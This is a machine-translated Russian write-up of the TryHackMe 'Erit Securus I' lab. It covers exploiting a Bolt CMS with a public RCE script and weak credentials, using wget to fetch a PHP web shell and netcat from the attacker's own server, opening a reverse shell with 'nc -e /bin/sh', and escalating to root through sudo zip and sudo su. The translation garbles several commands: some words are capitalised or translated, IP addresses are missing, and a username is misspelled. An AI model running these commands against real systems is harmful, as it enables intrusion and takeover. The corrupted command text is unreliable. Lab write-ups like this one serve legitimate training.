Эта рецензия является второй из моей серии рецензий TryChme. В последнее время я тщательно погружал пальцы ног в пентеринг и люблю делать заметки, поэтому я подумал, что напишу их.
Это рецензия для Erit Securus I
NB: Я собираюсь предположить, что вы управляете Kali Linux, и вы работаете из пустой папки, которую вы сделали для этой комнаты.
По обычным, мы собираемся начать с того, что мы запустим наше сканирование NMAP на коробке, чтобы выяснить, какие порты открыты, что работает на этих портах и какие версии этих приложений работают. Мы сохраним все эти результаты в файле. Это дает нам ответы на всю задачу № 2.
mkdir scans nmap -sC -sV -oN scans/nmap
Давайте посмотрим на приложение, которое мы будем эксплуатировать, открыв страницу в нашем браузере. Похоже, ваш обычный CMS. Когда мы проверяем браузер, мы можем увидеть, какой именно CMS он работает. Из быстрого поиска в Google мы узнаем, что страница входа для этой CMS живет в рамках /болт/логин . Мы могли бы придумать детали входа для пользователя, но это не совсем то, для чего предназначена эта комната. Просто угадайте пару комбинаций имени пользователя/паролей, которые будут работать для очень плохо защищенной панели администратора, и я уверен, что вы получите правильную информацию.
Мы загружаем эксплойт с задания № 4, запустив git clone https://github.com/r3m0t3nu11/boltcms-auth-rce-py В нашей папке проекта.
Мы откроем папку эксплойтов в нашем терминале, запустив CD BOLTCMS-AUTH-RCE-PY И затем мы устанавливаем требования с PIP, работая PIP3 Установка -r Требования.txt Анкет
Теперь мы готовы запустить эксплойт.
python3 exploit.py http://username password
Через некоторое время эксплойт позволяет нам начать выполнять команды на сервере. Инструкции по комнате говорят вам, чтобы вы поместили немного PHP -кода в файл, но я предпочитаю сделать это немного по -другому. Для стабильности мы собираемся загрузить оболочку на сервер. Я люблю использовать P0wny Shell Но вы можете использовать все, что чувствует себя хорошо.
Давайте загрузим файл PHP и поместим его в нашу папку проекта. Затем настройте сервер Python с использованием Simplehttpserver в отдельном окне или вкладке терминала:
python -m SimpleHTTPServer
Теперь, в окне эксплойта, мы собираемся получить наш файл shell.php с нашего сервера Python:
wget "http://:8000/shell.php"
Когда мы посещаем файл оболочки в /файлы/ Папка В веб -приложении мы получаем более стабильную оболочку, которая позволяет нам выполнять больше команд. Отсюда мы собираемся скачать netcat Итак, мы получаем хорошую обратную оболочку. Давайте сделаем NetCat доступным на нашем HTTP -сервере, копировав его в нашу папку проекта. Запустите следующую команду в папке проекта:
ln -s $(which nc) .
А затем загрузите его с оболочки PHP и сделайте исполнение:
wget "http://:8000/nc" chmod +x ./nc
Теперь настройте слушателя на нашу собственную коробку:
nc -nvlp 4444
И запустите NetCat из файла Shell, отправив команду Shell на наш собственный IP, затем обновите оболочку Так что это красивая оболочка Bash:
nc -e /bin/sh4444
Поздравляю, теперь у вас есть обратная оболочка на этом сервере! Обязательно обновите его, как только у вас есть, используя Python:
python -c 'import pty;pty.spawn("/bin/bash")'
Задача 6 довольно проста, если вы делаете именно то, что в комнате говорит вам. Вы не ошибетесь.
Для задачи 7 мы собираемся запустить судо -l Как только мы подключимся к локальной коробке с помощью SSH. Это показывает нам ответ на вопрос в задаче 7 и дает нам ценную информацию о том, как мы могли бы обострить наши привилегии. Формат для ответа на задачу 7 показывает нам, что мы можем выполнить /usr/bin/zip как Jsmith пользователь. Когда мы посещаем Страница GTFOBIN для этого файла Мы видим, что мы сможем обострить наши привилегии к Jsmith Пользователь, запустив эти команды:
TF=$(mktemp -u) sudo -u sjmith zip $TF /etc/hosts -T -TT 'sh #'
Как Jsmith Пользователь, мы запускаем одну и ту же команду Python, чтобы обновить нашу оболочку, а затем взглянем на то, что мы можем сделать, используя Sudo, запустив судо -l .
Кажется, мы можем сделать буквально все, что хотим, как Sudo, все без использования пароля, поэтому просто запустите Sudo su Чтобы обострить корни, и теперь вы можете делать все, что хотите на этом сервере.
Поздравляем с завершением Erit Securus I!
Оригинал: “https://dev.to/stefandorresteijn/tryhackme-com-erit-securus-i-writeup-2g89”